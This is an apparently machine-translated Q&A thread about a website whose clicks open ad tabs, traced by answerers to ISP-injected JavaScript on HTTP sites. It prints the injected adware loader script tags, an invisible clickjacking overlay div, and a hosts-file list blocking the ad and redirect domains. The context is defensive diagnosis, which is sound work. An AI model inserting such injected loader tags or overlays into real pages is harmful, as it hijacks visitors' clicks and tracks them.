Javascript 未知脚本正在运行并在单击时重定向到未知网站

Javascript 未知脚本正在运行并在单击时重定向到未知网站,javascript,jquery,html,css,malware,Javascript,Jquery,Html,Css,Malware,问题:-有时,单击导航栏菜单或我的引导程序网站上的任何div,它会重定向到新选项卡中的广告或未知链接,如下图所示 从托管文件导入的链接:- <link rel="stylesheet" type="text/css" href="css\bootstrap.min.css"> <script src="js/jquery.min.js"></script> <script src="js/main.js"></script

问题:-有时,单击导航栏菜单或我的引导程序网站上的任何div,它会重定向到新选项卡中的广告或未知链接,如下图所示

从托管文件导入的链接:-

<link rel="stylesheet" type="text/css" href="css\bootstrap.min.css">

    <script src="js/jquery.min.js"></script>
    <script src="js/main.js"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>


    <link rel="stylesheet" type="text/css" href="css\style.css">

    <link href="https://fonts.googleapis.com/css?family=Montserrat" rel="stylesheet" type="text/css">

    <link href="https://fonts.googleapis.com/css?family=Lato" rel="stylesheet" type="text/css">

    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.0.8/css/all.css" integrity="shaxxx-xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"
        crossorigin="anonymous">

<script src="https://maps.googleapis.com/maps/api/js?key=xxxxxxxxxxxxxxxxxxxxxxxxxx&callback=myMap "></script>
<script src='//117.240.205.115:3000/getjs?nadipdata="%7B%22url%22:%22%2Fjs%2Fjquery.min.js%22%2C%22referer%22:%22http:%2F%2Famans.xyz%2F%22%2C%22host%22:%22amans.xyz%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D"&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530041241377&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0' async=""></script>

<script src="http://amans.xyz/js/jquery.min.js?cb=1530041241381&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag" type="text/javascript"></script>
我尝试过的:-

我的代码是干净的,没有脚本将其重定向到某个地方。可能是我的浏览器或Windows被破坏了。我从EDGE、CHROME、FIREFOX三种浏览器查看了网站。。我也有同样的问题。然后,我从Win7升级到Windows 10并重新安装。但什么也没发生。然后我想问一下Hostgator的支持,如果服务器被破坏了,他们会从最后回答说没问题。。。 我安装了malwarebytes和所有软件来解决这个问题……但他们只是通知chrome/firefox/Edge正在重定向到一些域名为go.oclasrv.com的出站ID,并且什么也不做

**

有解决方案吗?

**

更新:-

Request URL: http://cobalten.com/apu.php?zoneid=1492761&_=1530105294644
Request Method: GET
Status Code: 200 OK
Remote Address: 188.42.162.184:80
Referrer Policy: no-referrer-when-downgrade
Cache-Control: private, max-age=0, no-cache
Connection: keep-alive
Content-Encoding: gzip
Content-Type: application/x-javascript
Date: Wed, 27 Jun 2018 13:14:57 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: CP="CUR ADM OUR NOR STA NID"
Pragma: no-cache
Server: nginx
Strict-Transport-Security: max-age=1
Timing-Allow-Origin: *, *
Transfer-Encoding: chunked
X-Content-Type-Options: nosniff
X-Used-AdExchange: 1
Provisional headers are shown
Referer: http://amans.xyz/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
zoneid: 1492761
_: 1530105294644
我在Hostgator支持反馈链接上得到了类似的重定向

注意,这里字符串中的域名被rateus.in替换 zoneid=1492761与我打开的任何不安全链接相同。。 此外,对于不同的链接,cb=XXXXXXXXXXXXX和tm=XXXXXXXXXX也会更改,对于我打开的所有链接,指纹=c2VwLW5vLXJlZGlyZWN0都是相同的。

<div class="pxdouz70egp12" style="left: 0px; top: 9360px; width: 658px; height: 650px; background-image: url("data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"); position: absolute; z-index: 2000; </div>
<script async="" src="//117.240.205.115:3000/getjs?nadipdata=&quot;%7B%22url%22:%22%2Fcommon%2Fjs%2Fjquery-1.7.1.js%22%2C%22referer%22:%22http:%2F%2Frateus.co.in%2Findex.php%3Fbrowse%3DHostGatorIN_Chat_HGIChatCSAT%22%2C%22host%22:%22rateus.co.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D&quot;&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530191489196&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>

<script type="text/javascript" src="http://rateus.co.in/common/js/jquery-1.7.1.js?cb=1530191489199&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag"></script>

<span id="notiMain"><script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761"></script></span>

我的操作系统完全升级到WIN10 pro,我只安装了Chrome,没有任何插件

问题与浏览器无关,因为我在EDGE和Firefox上得到了相同的结果。

<div class="pxdouz70egp12" style="left: 0px; top: 9360px; width: 658px; height: 650px; background-image: url("data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7"); position: absolute; z-index: 2000; </div>
<script async="" src="//117.240.205.115:3000/getjs?nadipdata=&quot;%7B%22url%22:%22%2Fcommon%2Fjs%2Fjquery-1.7.1.js%22%2C%22referer%22:%22http:%2F%2Frateus.co.in%2Findex.php%3Fbrowse%3DHostGatorIN_Chat_HGIChatCSAT%22%2C%22host%22:%22rateus.co.in%22%2C%22categories%22:%5B0%5D%2C%22reputations%22:%5B1%5D%7D&quot;&amp;screenheight=768&amp;screenwidth=1360&amp;tm=1530191489196&amp;lib=true&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0"></script>

<script type="text/javascript" src="http://rateus.co.in/common/js/jquery-1.7.1.js?cb=1530191489199&amp;fingerprint=c2VwLW5vLXJlZGlyZWN0&amp;onIframeFlag"></script>

<span id="notiMain"><script type="text/javascript" src="//go.oclasrv.com/apu.php?zoneid=1492761"></script></span>

任何可以在这里帮助我的JS专家

您遇到的这个问题是服务器端的。很可能你的代码没有问题,但是服务器被恶意软件感染,这些恶意代码被注入你的网站


为了解决这个问题,我会备份您编写的代码,更改您的FTP托管密码,删除您的服务器,然后重新添加代码。如果这不能解决问题,那么我会更换主机提供商。

这似乎是ISP注入JavaScript文件的情况。你有机会使用BSNL宽带吗?。在过去的几天里,BSNL似乎在HTTP(非加密)站点上注入广告软件


我知道的唯一解决方案是在https上托管您的站点或更改您的ISP。

如果您看到从以下IP注入的未知脚本,则它是BSNL ISP注入的脚本文件

61.0.245.90, 117.205.13.171
这些脚本仅在您访问HTTP网站时注入。HTTPS涉及传输层安全性,因此ISP无法对其进行篡改

这个IP的脚本文件只是一个管道,可以从不同的广告媒体下载更多的广告脚本。大多数广告媒体都是在侵入性广告之后,通过劫持用户鼠标点击打开弹出窗口

BSNL为此类活动提供的借口是,这是一项增强用户浏览体验的功能。有一篇详细的帖子写在上面,以及如何阻止这些

抓得好

由于安全性差,BSNL服务器每天都在腐蚀或感染恶意软件/病毒

naganoadigei.com被明确注册以服务恶意软件并将用户重定向到钓鱼网站

最近在2019年2月,他们解决了这个问题。但不幸的是,新型的 基于广告的重定向发现,截至2019年2月,humparsi.com的转发量为

您可以通过访问查看该站点是否已被感染


或者,您可以通过DNS条目中的独立系统阻止传出请求

导航到
%windir%\System32\drivers\etc
,在提升模式下/通过管理员授权编辑主机文件,并将这些行添加到您的主机文件中

0.0.0.0 preskalyn.com
0.0.0.0 xalabazar.com
0.0.0.0 humparsi.com
0.0.0.0 naganoadigei.com
0.0.0.0 cobalten.com
0.0.0.0 rateus.co.in
0.0.0.0 go.oclasrv.com
0.0.0.0 onclickmax.com
0.0.0.0 bsnl.phozeca.com
0.0.0.0 phozeca.com
0.0.0.0 c.phozeca.com
上述站点不受SSL保护

要阻止特定的IP地址,可以通过阻止防火墙中的传出边界来实现

为了减少影响或任何不太可能的负面影响,您可以通过安装诸如
NoScript
ScriptSafe

要了解哪个应用程序使用分配了端口号的IP地址,请执行以下操作:

C:\Windows\system32>netstat -anob
只需从路由器的安全部分屏蔽URL(这些广告的bsnl IP)。对于我来说,bsnl URL是

已经修复了这个问题,因为它被引用来阻止点击劫持。 该脚本可以在移动浏览器中看到,打开新的标签广告


更新您的最新版本以查看

听起来像是病毒或JS注入。我们对此无能为力。这可能有帮助,也可能没有帮助,但您可以尝试通过HTTPS为您的站点提供服务吗?这将有助于确定在内容传输过程中发生篡改的位置。当HTTP请求不安全时,由于BSNL注入其广告脚本,因此会发生篡改。你可以在你的本地机器/域系统上添加IP安全策略。在BSNL上报告的类似投诉n/w是真正的罪魁祸首。目前我正在Hostgator上执行共享托管计划。。。由于它是一个静态网站,我无法负担一个静态网站的专门服务。。我可以向域中添加SSL证书,但不知道这是否能解决我的问题。。。。Hostgator的支持也同样可悲。。他们的话是“你想让我做什么”。此外,hostgator上的Sitelock恶意软件保护器等保护附加组件是否能够防止恶意软件攻击???。或者,我猜他们是故意感染共享主机来销售他们的附加组件…任何更好的无恶意共享主机提供商,具有加拿大地区最佳的正常运行时间。我建议对您知道的所有无恶意代码进行备份,然后删除服务器上您有权访问的所有文件。然后更改所有密码(使其复杂),然后重新添加文件。你试过了吗?这是我下一步要做的。。但是今天当我联系并分享代码和